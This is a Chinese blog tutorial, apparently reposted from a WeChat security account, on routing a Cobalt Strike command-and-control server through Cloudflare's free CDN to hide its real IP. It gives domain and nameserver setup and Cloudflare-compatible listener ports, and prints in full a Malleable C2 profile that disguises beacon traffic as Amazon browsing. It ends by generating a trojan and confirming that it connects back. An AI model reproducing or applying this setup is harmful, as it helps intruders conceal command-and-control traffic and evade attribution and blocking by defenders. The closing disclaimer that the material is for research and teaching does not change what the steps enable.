CDN上线CS隐藏真实ip

admin
admin
admin
138674
文章
114
评论
2022年6月17日13:00:22评论381 views字数 1926阅读6分25秒阅读模式

配置CDN

域名注册:

https://sg.godaddy.com/zh?isc=gennbacn07&checkAvail=1&tmskey=1dom_03_godaddycom&domainToCheck=flash
cloudflare 免费CDN:

https://www.cloudflare.com/zh-cn/

在GoDaddy购买一个域名后,在Cloudflare处添加站点,将域名填写进去
CDN上线CS隐藏真实ip




随后添加一条DNS解析
CDN上线CS隐藏真实ip




然后需要修改此处的域名服务器地址。
CDN上线CS隐藏真实ip




单击更改跳转后,再点击左下角的 "输入我自己的域名服务器"
内容设置为cloudflare提供的地址

leonard.ns.cloudflare.commolly.ns.cloudflare.com

CDN上线CS隐藏真实ip




CDN上线CS隐藏真实ip




单击保存,点继续,添加成功,然后要在缓存设置处打开这两个选项。
CDN上线CS隐藏真实ip




将此处设置为灵活。
CDN上线CS隐藏真实ip




去尝试多地ping
CDN上线CS隐藏真实ip




配置CS profile文件

这里使用github上的一个模板,将两处host头修改为我们的域名,然后保存为profile文件,上传到cs目录下

## Amazon browsing traffic profile# # Author: @harmj0y#set sleeptime "5000";set jitter    "0";set maxdns    "255";set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
http-get {    set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";
    client {
        header "Accept" "*/*";        header "Host" "www.amazon.com";
        metadata {            base64;            prepend "session-token=";            prepend "skin=noskin;";            append "csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996";            header "Cookie";        }    }
    server {
        header "Server" "Server";        header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT";        header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=";        header "X-Frame-Options" "SAMEORIGIN";        header "Content-Encoding" "gzip";
        output {            print;        }    }}
http-post {        set uri "/N4215/adj/amzn.us.sr.aps";
    client {
        header "Accept" "*/*";        header "Content-Type" "text/xml";        header "X-Requested-With" "XMLHttpRequest";        header "Host" "www.amazon.com";
        parameter "sz" "160x600";        parameter "oe" "oe=ISO-8859-1;";        id {            parameter "sn";        }
        parameter "s" "3717";        parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com";
        output {            base64;            print;        }    }
    server {
        header "Server" "Server";        header "x-amz-id-1" "THK9YEZJCKPGY5T42OZT";        header "x-amz-id-2" "a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=";        header "X-Frame-Options" "SAMEORIGIN";        header "x-ua-compatible" "IE=edge";
        output {            print;        }    }}

随后运行服务端并加载这个profile文件
CDN上线CS隐藏真实ip



设置监听器

打码的地方填写自己的域名,因为cloudflare的原因这里端口的设置需要注意以下:
若是http,则只能设置80,8080,8880,2052,2082,2086,2095这些端口号
若是https,则只能443,2053,2083,2087,2096,8443 这些端口号
CDN上线CS隐藏真实ip




随后生成木马测试是否能正常上线

CDN上线CS隐藏真实ip



可以成功上线,并且ip也是在不断变化的。


原文始发于微信公众号(白帽兔):CDN上线CS隐藏真实ip

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月17日13:00:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CDN上线CS隐藏真实iphttps://cn-sec.com/archives/1124460.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息